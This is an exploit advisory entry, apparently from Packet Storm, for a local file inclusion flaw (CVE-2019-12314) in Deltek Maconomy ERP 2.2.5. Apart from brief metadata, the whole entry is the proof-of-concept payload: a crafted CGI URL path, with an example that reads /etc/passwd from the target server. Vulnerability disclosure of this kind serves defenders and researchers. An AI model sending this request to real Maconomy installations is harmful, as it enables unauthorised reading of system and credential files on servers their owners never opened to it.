Deltek Maconomy 2.2.5 Local File Inclusion

2019-05-27T00:00:00
ID PACKETSTORM:153079
Type packetstorm
Reporter Jameel Nabbo
Modified 2019-05-27T00:00:00

Description

                                        
                                            `# Exploit Title: Maconomy Erp local file include  
# Date: 22/05/2019  
# Exploit Author: JameelNabbo  
# Website: jameelnabbo.com  
# Vendor Homepage: https://www.deltek.com  
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy  
# CVE: CVE-2019-12314  
POC:  
  
POC:  
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI  
Example  
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd  
`